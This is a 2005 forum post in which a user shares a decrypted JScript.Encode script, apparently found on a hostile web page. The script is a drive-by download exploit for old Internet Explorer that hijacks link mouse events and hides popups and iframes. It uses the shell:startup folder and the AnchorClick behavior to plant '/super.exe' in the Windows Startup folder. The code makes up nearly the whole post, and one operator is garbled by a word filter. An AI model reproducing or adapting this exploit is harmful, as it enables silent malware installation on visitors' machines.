Thread: hey h@ckers
View Single Post
Old 01-27-2005, 03:19 PM  
Harmon
( ͡ʘ╭͜ʖ╮͡ʘ)
 
Harmon's Avatar
 
Industry Role:
Join Date: Mar 2004
Posts: 20,010
This is it decrypted:

Code:
< SCRIPT language = JScript.Encode > var pop;
var uploaded;
var obj;
var burl;
var hiddenImg;
var totalobj;
if(!uploaded)
{
	burl = "/super.exe";
}

function initpop()
{
	if(!pop)
	{
		pop = window.createPopup();
		var oBody = pop.document.body;
		pop.document.bgColor = "black";
		oBody.style.border = "solid black 0px";
		oBody.style.position = "absolute";
		oBody.style.left = "0";
		oBody.style.top = "0";
		var temp;
		temp = '<DIV style="position:relative;"><a href="' + "#\" onBlur='parent.document.getElementById(\"i_frame\").style.visibility=\"hidden\"' ";
		temp += "onMouseOut='document.getElementById(\"client\").style.visibility=\"hidden\"' \
OnMouseOver='document.getElementById(\"client\").style.visibility=\"visible\"' \
onMouseDown='parent.document.getElementById(\"i_frame\").style.visibility=\"visible\";parent.pop.show(1,1,1,1);parent.uploaded=1;parent.DoClick();'> \
I\
<DIV  ID=\"client\" STYLE=\"visibility:hidden; position:absolute; top:-25; left:-25;\">\
<img nocache border=1 style=\"width=500px;heigth=500px; cursor:hand;\" dynsrc=\"" + burl + "\" ></div></a></div>";
		oBody.innerHTML = temp;
	}
}

function clean()
{
	uploaded = 1;
	if(pop)
		pop.hide();
}

if(!uploaded)
{
	initpop();
	window.onbeforeunload = clean;
}

function DoClick()
{
	window.setTimeout('obj.click();', 300);
}

function showpop()
{
	if(uploaded)
		return;

	obj = window.event.srcElement;
	if(!pop)
	{
		initpop();
	}

	pop.show(window.event.screenX, window.event.screenY, 1, 1);
	document.getElementById("i_frame").style.left = window.event.screenX - window.screenLeft - document.body.clientLeft + document.body.scrollLeft;
	document.getElementById("i_frame").style.top = window.event.screenY - window.screenTop - document.body.clientTop + document.body.scrollTop;
}

function SetAllEvents()
{
	totalobj = document.all.length;
	for(i = 0; i < document.all.length; i++)
	{
		if(document.all(i).tagName hahahaha "A" && document.all(i).id != "clientcall")
			document.all(i).onmousemove = showpop;
	}
}

if(!uploaded)
{
	setTimeout("SetAllEvents();", 400);
	document.write('<div  id=i_frame name=i_frame  STYLE="visibility:hidden;position:absolute;top=0;left=0;width:1;height:1;overflow:hidden"><iframe frameborder="1" name="clientframe" id="clientframe"  style="position:relative;top=-250;left=-440;width:700;height:700;"></iframe></div>');
	document.write('<a folder="shell:startup" target="clientframe" id="clientcall" style="visibility:hidden;display:none;behavior:url(#default#AnchorClick);"></a>');
	document.getElementById("clientcall").click();
	document.write('<iframe src="about:blank" style="visibility:hidden;display:none;"></iframe>');
}

 <  / SCRIPT >
EDIT: oops, ya got it already
__________________
[email protected]
Harmon is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote